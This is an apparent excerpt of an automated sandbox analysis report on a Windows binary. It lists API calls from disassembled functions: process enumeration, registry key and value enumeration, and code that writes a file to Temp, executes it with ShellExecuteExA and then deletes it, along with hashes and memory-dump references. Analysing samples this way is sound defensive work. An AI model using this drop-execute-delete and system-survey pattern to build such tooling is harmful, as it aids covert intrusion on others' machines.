                                                  • Part of subcall function 00411650: GetCurrentProcess.KERNEL32(00408706,?,?,00408706,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411661
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409407
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00409428
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409435
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409456
                                                  • Part of subcall function 0041167A: OpenProcess.KERNEL32(00000400,00000000,?,?,0040924B,?), ref: 00411690
                                                  • Part of subcall function 0041127D: _itoa.MSVCRT ref: 0041129B
                                                  • Part of subcall function 0041127D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,00000000,00419288,00000000,00419288,?,00419288,?), ref: 004112AF
                                                  • Part of subcall function 00411705: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00411718
                                                  • Part of subcall function 00411705: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00411750
                                                  • Part of subcall function 004113BA: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113C5
                                                  • Part of subcall function 004113BA: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113D1
                                                  • Part of subcall function 004113BA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113DB
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094D1
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094E1
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094EE
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004146D0,00000000,004146D0,00000000,004146D0), ref: 004094FE
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004146D0,00000000), ref: 0040950B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040951B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409528
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409538
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409544
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409550
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409559
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409565
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040956E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040957A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409583
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040958F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409598
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004095A1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004095AD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004095B9
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004095C5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004095D1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004095DA
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004095E8
                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 004095F7
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 00409604
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040960D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                                • String ID:
                                                • API String ID: 819894693-0
                                                • Opcode ID: c1552d7fa9ccb7c8e72d5be230a8c76e7393b90730f99ca73fa8c2ead45fed27
                                                • Instruction ID: 0f7038aa123667529b47f5b5d6000185a29ddb58a02295160c2c54ac7022629c
                                                • Opcode Fuzzy Hash: c1552d7fa9ccb7c8e72d5be230a8c76e7393b90730f99ca73fa8c2ead45fed27
                                                • Instruction Fuzzy Hash: DB51EC7280011EABCF15EBA1DD49EEF777CEF15305F1041AAF506E2061EA389B49CB68
                                                APIs
                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040AEEC
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0040AF1B
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041417C,?), ref: 0040AF31
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF43
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040AF51
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF5A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF63
                                                • RegEnumValueW.ADVAPI32(?,?,?,00003FFF,00000000,?,?,00002710), ref: 0040AFC4
                                                • _itoa.MSVCRT ref: 0040AFDB
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041417C,?), ref: 0040AFF3
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B005
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040B013
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B01C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B028
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413760,?), ref: 0040B03D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B04C
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040B05A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B063
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B06F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?), ref: 0040B084
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 0040B09F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B0AD
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040B0BB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$Hstd@@V01@V01@@V?$basic_string@Y?$basic_string@$D@1@@V10@@$D@2@@0@EnumG@1@@G@2@@0@$InfoQueryV10@0@Value_itoa
                                                • String ID: [regsplt]
                                                • API String ID: 2158026845-4262303796
                                                • Opcode ID: 8cff23506c9dcb327d004423012b36e824569878459136bd91875200537e0429
                                                • Instruction ID: cc80ac265b5ea2df847b84b2b2dbab06691396435459e9b21fec3c263dc06e50
                                                • Opcode Fuzzy Hash: 8cff23506c9dcb327d004423012b36e824569878459136bd91875200537e0429
                                                • Instruction Fuzzy Hash: 367198B290011EAFDB11DF90DD95DEEBB7CFB18305F0081A6E606A2150EB749B89CF59
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040B1A6
                                                  • Part of subcall function 0040B0F8: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM), ref: 0040B10B
                                                  • Part of subcall function 0040B0F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B17B
                                                • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 0040B1C4
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00413984,00419288,00000000,00419288,00000000,00419288,00419D40,00419288,00419D60), ref: 0040B22C
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00419D40,00419288,00419D60), ref: 0040B239
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00419288,00419D60), ref: 0040B246
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00419288,00419D60), ref: 0040B253
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00419288,00419D60), ref: 0040B260
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00419288), ref: 0040B26D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B27D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B287
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040B2A1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2AA
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2B3
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2BC
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2C5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2CE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2D7
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2E0
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B2EC
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(004137F0), ref: 0040B2FD
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(004137F0), ref: 0040B309
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 0040B31A
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 0040B326
                                                • RegCloseKey.ADVAPI32(?), ref: 0040B32F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413988,?), ref: 0040B347
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040B35C
                                                  • Part of subcall function 0040AE7D: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040AEEC
                                                  • Part of subcall function 0040AE7D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0040AF1B
                                                  • Part of subcall function 0040AE7D: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041417C,?), ref: 0040AF31
                                                  • Part of subcall function 0040AE7D: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF43
                                                  • Part of subcall function 0040AE7D: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040AF51
                                                  • Part of subcall function 0040AE7D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF5A
                                                  • Part of subcall function 0040AE7D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF63
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                                • String ID: p6A
                                                • API String ID: 3909728815-595022129
                                                • Opcode ID: 25a0cbb1e5955caba7e5677cdc3c19ccf2cd48252a3f88a26c83d53bf2acdcdc
                                                • Instruction ID: 2056ae82baa0d00cc158b8747cfe5b403208ffe184cd5bb3e09086c41e73c1d0
                                                • Opcode Fuzzy Hash: 25a0cbb1e5955caba7e5677cdc3c19ccf2cd48252a3f88a26c83d53bf2acdcdc
                                                • Instruction Fuzzy Hash: A9418572900109ABCB04BFA1ED5ADDF7B7CEB10305B10817AF506A3191EA789F45CBA9
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413764,?,?), ref: 0040EBA0
                                                • getenv.MSVCRT ref: 0040EBAC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 0040EBB8
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EBC5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EBD0
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EBD9
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040EBE6
                                                • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040EBF3
                                                • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040EBFF
                                                • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040EC18
                                                • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040EC25
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040EC44
                                                • ShellExecuteExA.SHELL32(0000003C), ref: 0040EC61
                                                • WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040EC99
                                                • CloseHandle.KERNEL32(?), ref: 0040ECA2
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040ECAB
                                                • DeleteFileA.KERNEL32(00000000), ref: 0040ECB2
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040EC85
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?,?,?,?,?), ref: 0040ECCC
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040ECE6
                                                • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(0000006F), ref: 0040ECFE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040ED07
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040ED10
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040ED19
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                                • String ID: <$@$Temp
                                                • API String ID: 2271834883-1032778388
                                                • Opcode ID: e52d138bcfb490f1b80497a0561799877e956440a3de0df827a9bfd32d9eb261
                                                • Instruction ID: 3689fd71246cb1742730e42802e0dd38cc1dbb75999f8c4bec599ec1ada99012
                                                • Opcode Fuzzy Hash: e52d138bcfb490f1b80497a0561799877e956440a3de0df827a9bfd32d9eb261
                                                • Instruction Fuzzy Hash: 91414F7194011AEBDB14EFA0DD4AAEEBB78FF04706F10807AF502A21D0DB795B49CB59
                                                APIs
                                                  • Part of subcall function 004112FA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
                                                  • Part of subcall function 004112FA: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                  • Part of subcall function 004112FA: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419E68,00413888,00000000,00000001), ref: 0040DB8F
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DB9C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DBAA
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DBB6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040DBC3
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040DBD0
                                                  • Part of subcall function 00411980: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,80000001,00419970,?,00409E13,?,?), ref: 0041199A
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B), ref: 0040DBF4
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DC06
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DC0F
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040DC24
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DC2E
